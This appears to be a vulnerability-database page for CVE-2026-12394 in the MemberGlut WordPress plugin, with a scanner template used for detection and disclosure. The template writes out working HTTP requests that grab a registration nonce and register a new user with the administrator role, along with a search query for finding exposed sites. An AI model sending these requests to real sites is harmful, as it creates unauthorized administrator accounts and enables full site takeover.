/Vulnerability Library

WordPress MemberGlut < 1.1.5 - Unauthenticated Privilege Escalation

CVE-2026-12394
Verified

Description

MemberGlut WordPress plugin < 1.1.5 contains a broken access control vulnerability caused by lack of validation of roles during front-end registration, letting unauthenticated users register with arbitrary roles including administrator, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

1%

Affected Product

memberglut

Published Date

August 11, 2026

Template Author

str4k3r

CVE-2026-12394.yaml
id: CVE-2026-12394

info:
  name: WordPress MemberGlut < 1.1.5 - Unauthenticated Privilege Escalation
  author: str4k3r
  severity: critical
  description: |
    MemberGlut WordPress plugin < 1.1.5 contains a broken access control vulnerability caused by lack of validation of roles during front-end registration, letting unauthenticated users register with arbitrary roles including administrator, exploit requires no authentication.
  impact: |
    Unauthenticated users can register as administrators, leading to full site compromise.
  remediation: |
    Update to version 1.1.5 or later.
  reference:
    - https://wpscan.com/vulnerability/6b126a3e-30d5-4bed-ba47-33e589ec2852/
    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.0/includes/class-memberglut-forms.php
    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.5/includes/class-memberglut-forms.php
    - https://nvd.nist.gov/vuln/detail/CVE-2026-12394
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-12394
    epss-score: 0.01492
    epss-percentile: 0.72579
    cwe-id: CWE-269
  metadata:
    max-request: 3
    verified: true
    vendor: memberglut
    product: memberglut
    fofa-query: body="wp-content/plugins/memberglut"
  tags: cve,cve2026,wordpress,wp-plugin,memberglut,privesc,unauth,wp

variables:
  rand_user: "{{to_lower(rand_text_alpha(8))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /register/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "register_nonce", "memberglut_register")
          - status_code == 200
        condition: and
        internal: true

    extractors:
      - type: regex
        name: register_nonce
        part: body
        group: 1
        regex:
          - 'name="register_nonce"\s*value="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /register/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=memberglut_register&register_nonce={{register_nonce}}&username={{rand_user}}&email={{rand_user}}@example.test&password=Cve12394Test1!&first_name=a&last_name=a&default_role=administrator

      - |
        GET /wp-admin/users.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302
          - contains(header_1, "registration_success")
          - status_code_2 == 200
          - contains_all(body_2, "wpbody-content", "Administrator")
        condition: and
# digest: 4b0a0048304602210084cd0ac27b41cac306ec0bbf5204be6327e297a1f94321ea42987b12f4c0fc54022100dd38eca232100a8b18d679b5008b92e19b1bab3c91229a27086e5f327242cb4f:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-12394
CWE ID:
cwe-269

References

https://wpscan.com/vulnerability/6b126a3e-30d5-4bed-ba47-33e589ec2852/https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.0/includes/class-memberglut-forms.phphttps://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.5/includes/class-memberglut-forms.phphttps://nvd.nist.gov/vuln/detail/CVE-2026-12394

Remediation Steps

Update to version 1.1.5 or later.